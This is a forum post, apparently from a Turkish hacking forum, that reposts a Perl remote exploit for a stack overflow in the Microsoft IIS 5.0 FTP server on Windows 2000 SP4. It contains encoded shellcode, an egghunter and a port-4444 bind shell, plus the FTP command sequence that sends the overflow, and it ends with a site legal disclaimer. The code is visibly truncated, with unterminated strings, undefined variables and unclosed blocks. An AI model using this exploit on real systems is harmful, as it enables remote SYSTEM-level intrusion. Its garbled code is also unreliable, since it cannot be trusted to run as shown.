Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)


Kıdemli Üye
30 Ocak 2009
[SIZE=3][FONT=Courier New]#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit 
# Win2k SP4 targets 
# bug found & exploited by Kingcope, kcope2<at> 
# Affects IIS6 with stack cookie protection 
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444


use IO::Socket; 
$sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" .
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" .
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" .
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" .
"\x50\x38\x41\x43\x4a\x4a\x49\x45\x36\x4d\x51\x48\x4a\x4b\x4f" .
"\x44\x4f\x47\x32\x46\x32\x42\x4a\x43\x32\x46\x38\x48\x4d\x46" .
"\x4e\x47\x4c\x45\x55\x51\x4a\x44\x34\x4a\x4f\x48\x38\x46\x34" .
"\x50\x30\x46\x50\x50\x57\x4c\x4b\x4b\x4a\x4e\x4f\x44\x35\x4a" .
# ./msfpayload windows/shell_bind_tcp R |  ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

$shell="T00WT00W" ."\xda\xde\xbd\x2d\xe7\x9b\x9f\x2b\xc9\xb1\x56\xd9\x74\x24\xf4" .
"\x5a\x83\xea\xfc\x31\x6a\x15\x03\x6a\x15\xcf\x12\x67\x77\x86" .
"\xdd\x98\x88\xf8\x54\x7d\xb9\x2a\x02\xf5\xe8\xfa\x40\x5b\x01" .
"\x71\x04\x48\x92\xf7\x81\x7f\x13\xbd\xf7\x4e\xa4\x70\x38\x1c" .
"\x66\x13\xc4\x5f\xbb\xf3\xf5\xaf\xce\xf2\x32\xcd\x21\xa6\xeb" .
"\x99\x90\x56\x9f\xdc\x28\x57\x4f\x6b\x10\x2f\xea\xac\xe5\x85" .
"\xf5\xfc\x56\x92\xbe\xe4\xdd\xfc\x1e\x14\x31\x1f\x62\x5f\x3e" .
"\xeb\x10\x5e\x96\x22\xd8\x50\xd6\xe8\xe7\x5c\xdb\xf1\x20\x5a" .
"\x04\x84\x5a\x98\xb9\x9e\x98\xe2\x65\x2b\x3d\x44\xed\x8b\xe5" .
"\x74\x22\x4d\x6d\x7a\x8f\x1a\x29\x9f\x0e\xcf\x41\x9b\x9b\xee" .
"\x85\x2d\xdf\xd4\x01\x75\xbb\x75\x13\xd3\x6a\x8a\x43\xbb\xd3" .
"\x2e\x0f\x2e\x07\x48\x52\x27\xe4\x66\x6d\xb7\x62\xf1\x1e\x85" .
"\x2d\xa9\x88\xa5\xa6\x77\x4e\xc9\x9c\xcf\xc0\x34\x1f\x2f\xc8" .
"\xf2\x4b\x7f\x62\xd2\xf3\x14\x72\xdb\x21\xba\x22\x73\x9a\x7a" .
"\x93\x33\x4a\x12\xf9\xbb\xb5\x02\x02\x16\xc0\x05\xcc\x42\x80" .
"\xe1\x2d\x75\x36\xad\xb8\x93\x52\x5d\xed\x0c\xcb\x9f\xca\x84" .
"\x6c\xe0\x38\xb9\x25\x76\x74\xd7\xf2\x79\x85\xfd\x50\xd6\x2d" .
"\x96\x22\x34\xea\x87\x34\x11\x5a\xc1\x0c\xf1\x10\xbf\xdf\x60" .
"\x24\xea\x88\x01\xb7\x71\x49\x4c\xa4\x2d\x1e\x19\x1a\x24\xca" .
"\xb7\x05\x9e\xe9\x4a\xd3\xd9\xaa\x90\x20\xe7\x33\x55\x1c\xc3" .
"\x23\xa3\x9d\x4f\x10\x7b\xc8\x19\xce\x3d\xa2\xeb\xb8\x97\x19" .
"\xa2\x2c\x6e\x52\x75\x2b\x6f\xbf\x03\xd3\xc1\x16\x52\xeb\xed" .
"\xfe\x52\x94\x10\x9f\x9d\x4f\x91\xbf\x7f\x5a\xef\x57\x26\x0f" .
"\x52\x3a\xd9\xe5\x90\x43\x5a\x0c\x68\xb0\x42\x65\x6d\xfc\xc4" .

print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n"; 
if ($#ARGV ne 1) { 
print "usage: <target> <your local ip>\n"; 
$port = int(rand(31337-1022)) + 1025; 
$locip = $ARGV[1]; 
$locip =~ s/\./,/gi; 
if (fork()) { 
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], 
                              PeerPort => '21', 
                              Proto    => 'tcp'); 
$patch = "\x7E\xF1\xFA\x7F";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms 

$v = "KSEXY" . $sc . "V" x (500-length($sc)-5); 
# top address of stack frame where shellcode resides, is hardcoded inside this block 

# attack buffer 
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch. 
   ($patch x (52/4)) .$patch."EEEE$retaddr".$patch. 
$x = <$sock>; 
print $x;                             
print $sock "USER anonimoos\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "PASS $shell\r\n";
$x = <$sock>; 
print $x; 
print $sock "USER anonimoos\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "PASS $shell\r\n";
$x = <$sock>; 
print $x; 

print $sock "USER anonymous\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "PASS anonymous\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "MKD w00t$port\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack) 
$x = <$sock>; 
print $x; 
print $sock "SITE $v\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "SITE $v\r\n"; 
$x = <$sock>;
print $x; 
print $sock "SITE $v\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "SITE $v\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "CWD w00t$port\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "MKD CCC". "$c\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n"; 
$x = <$sock>; 
print $x; 
print $sock "NLST $c*/../C*/\r\n"; 
$x = <$sock>; 
print $x; 
while (1) {} 
} else { 
my $servsock = IO::Socket::INET->new(LocalAddr => "", LocalPort => $port, Proto => 'tcp', Listen => 1); 
die "Could not create socket: $!\n" unless $servsock; 
my $new_sock = $servsock->accept(); 
while(<$new_sock>) { 
print $_; 

# [2009-09-01][/FONT][/SIZE]
Üst internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır.; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.